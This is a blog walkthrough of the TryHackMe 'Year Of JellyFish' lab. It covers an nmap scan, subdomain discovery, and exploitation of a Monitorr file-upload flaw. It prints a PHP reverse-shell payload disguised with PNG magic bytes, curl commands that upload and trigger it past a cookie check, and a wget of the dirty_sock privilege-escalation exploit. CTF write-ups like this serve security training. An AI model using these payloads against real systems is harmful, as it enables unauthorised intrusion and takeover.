Year Of JellyFish TryHackme

0xsakthi 5

 Year Of JellyFish TryHackme Walkthrough

 

 

Nmap Scan
 

 Nmap scan report for ec2-54-154-149-95.eu-west-1.compute.amazonaws.com (54.154.149.95)  
 Host is up (0.21s latency).  
 Not shown: 995 filtered ports  
 PORT   STATE SERVICE VERSION  
 21/tcp  open ftp   vsftpd 3.0.3  
 22/tcp  open ssh   OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)  
 | ssh-hostkey:   
 |_ 2048 46:b2:81:be:e0:bc:a7:86:39:39:82:5b:bf:e5:65:58 (RSA)  
 80/tcp  open http   Apache httpd 2.4.29  
 | http-methods:   
 |_ Supported Methods: GET HEAD POST OPTIONS  
 |_http-server-header: Apache/2.4.29 (Ubuntu)  
 |_http-title: Did not follow redirect to https://robyns-petshop.thm/  
 443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))  
 | http-methods:   
 |_ Supported Methods: GET HEAD POST OPTIONS  
 |_http-server-header: Apache/2.4.29 (Ubuntu)  
 |_http-title: Robyn's Pet Shop  
 | ssl-cert: Subject: commonName=robyns-petshop.thm/organizationName=Robyns Petshop/stateOrProvinceName=South West/countryName=GB  
 | Subject Alternative Name: DNS:robyns-petshop.thm, DNS:monitorr.robyns-petshop.thm, DNS:beta.robyns-petshop.thm, DNS:dev.robyns-petshop.thm  
 | Issuer: commonName=robyns-petshop.thm/organizationName=Robyns Petshop/stateOrProvinceName=South West/countryName=GB  
 | Public Key type: rsa  
 | Public Key bits: 2048  
 | Signature Algorithm: sha256WithRSAEncryption  
 | Not valid before: 2021-04-25T12:55:33  
 | Not valid after: 2022-04-25T12:55:33  
 | MD5:  5e00 d923 e57a 0805 8112 1ba9 3492 fcc5  
 |_SHA-1: 7038 42c1 5c02 fa73 3064 ac31 fd42 1443 50e3 68fe  
 |_ssl-date: TLS randomness does not represent time  
 | tls-alpn:   
 |_ http/1.1  
 8000/tcp open http-alt  
 | fingerprint-strings:   
 |  GenericLines:   
 |   HTTP/1.1 400 Bad Request  
 |   Content-Length: 15  
 |_  Request  
 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :  
 SF-Port8000-TCP:V=7.91%I=7%D=4/25%Time=6085673A%P=x86_64-pc-linux-gnu%r(Ge  
 SF:nericLines,3F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Length:\x2  
 SF:015\r\n\r\n400\x20Bad\x20Request");  
 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port  
 OS fingerprint not ideal because: Missing a closed TCP port so results incomplete  
 No OS matches for host  
 Uptime guess: 23.288 days (since Fri Apr 2 11:32:36 2021)  
 TCP Sequence Prediction: Difficulty=264 (Good luck!)  
 IP ID Sequence Generation: All zeros  
 Service Info: Host: robyns-petshop.thm; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel  




Enumeration

 if you see the nmap result or you can visit the certificate you can find these

subdomains,,

 

robyns-petshop.thm

monitorr.robyns-petshop.thm

beta.robyns-petshop.thm

dev.robyns-petshop.thm 

Then add your /etc/hosts 









robyns-petshop.thm
 
 







pico from github? okkk



monitorr.robyns-petshop.thm
 
 
 
 
monitorr.robyns-petshop.thm
 



https://www.exploit-db.com/exploits/48980
 
 
 Sounds Good :)
 
 
 
 
 
but this exploit not work, after analyzing this exploit, i found how it works its pretty simple
  
then iam upload our shell via curl(gif format to bypass waf(filter) mentioned in exploit-db) first time its not work after i see the cookie editor this site have 
 
cookie value(isHuman=1) then iam mentioned cookie value in curl and  uploaded shell(php-shell-with-gif-magic-number) i get back reverse connection
 
 
if you not understand this exploit Read https://www.exploit-db.com/exploits/48980 this simple python code  
 
 
 
 
 
 
 
COMMANDS TO GET INITIAL SHELL

 
 


echo -e $'\x89\x50\x4e\x47\x0d\x0a\x1a\n<?php echo system("bash -c \'bash -i >& /dev/tcp/10.9.20.61/80 0>&1\'");' > shell.png.pHp

curl -k -F "fileToUpload=@./shell.png.pHp" https://monitorr.robyns-petshop.thm/assets/php/upload.php -H "Cookie: isHuman=1"  

curl -k https://monitorr.robyns-petshop.thm/assets/data/usrimg/shell.png.php  

  
  
 
initial shell
FLAG1.TXT

 
PRIVILLEGED ESCALATION

iam always using linpeas/linenum for privilleged escalation but this time i'm not get any interesting output i found some hashes but its not useful

so i use linux exploit suggester https://github.com/mzet-/linux-exploit-suggester
 i run this script it found lot of exploits, i tried dirty-sock! Few weeks ago i'm also did dirty-sock 
privelleged exploit on htb i don't know machine name if you know the machine name comment below  :)

Download Dirty-sock exploit
wget https://github.com/initstring/dirty_sock/archive/master.zip


Run this exploit

Now its look like Easy machine But its have lot of rabbit holes 

Don't TryHarder!
       Enumerate Harder!!
Understand The Exploit thats matter :) 













Tags

















0xsakthi




H4CK3R & Friend















5
Comments











  1. 0xarun30 April 2021 at 08:31
    Armageddon - dirty_sock
    ReplyDelete
  2. Jopraveen Hacker30 April 2021 at 18:04
    Great
    ReplyDelete
  3. jaeligadson5 March 2022 at 18:27
    Microtouch Titanium trim Reviews & Ratings | TITanium Arts
    The Microtouch mens titanium wedding rings Ti Mini is the latest version of the Microtouch Ti Mini, titanium granite featuring improved features titanium exhaust tubing such as an improved USB nano titanium babyliss pro 2.0 interface, venza titanium glow
    ReplyDelete











Post a Comment
















Previous Post


Next Post






      
    









Smartphones



Post ADS 1









Advertisement



Post ADS 1